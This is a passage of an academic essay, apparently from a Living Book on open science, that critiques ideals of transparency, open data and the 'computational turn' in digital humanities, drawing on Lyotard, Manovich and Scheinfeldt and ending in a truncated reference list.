government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). 
To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). 
It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010].) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol. 7, no. 1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011a), ‘“There's Been Too Much Secrecy in this City”: The False Choice Between Secrecy and Transparency in US Politics’, ''Cultural Politics'', 7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C. (2011b, forthcoming), ‘Transparency, Interrupted: Secrets of the Left’, ‘Between Transparency and Secrecy’ Annual Review, ''Theory, Culture and Society'', December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom’: the prepared text of U.S. Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010), ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. 
(2010), response to Tanner Higgin, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1988), ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M. and Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010), ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008), ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’, ''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MSNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Informatics'', September 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Informatics'', September 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), ‘We Can Know It For You: The Secret Life of Metadata’, ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgin, T. (2010), ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009), ‘Open Access – What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. 
http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science – the Future for Research?’, posting to the BOAI list, November 16. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker, A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', vol. 1, no. 1. http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 (accessed 20 June 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B. (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern’, ''Critical Inquiry'', vol. 30, no. 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011), ‘Where is Cultural Criticism in the Digital Humanities?’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’, Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991), ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010), ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011), ‘Trending: The Promises and the Challenges of Big Social Data’, ''Lev Manovich'', April 28. http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel (2010), ‘Energy Efficiency in the Home – UK – July 2010’, Mintel report. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S., Choi, S., Hoey, J., Kendall, C., Maskalyk, J. and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PLoS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. 
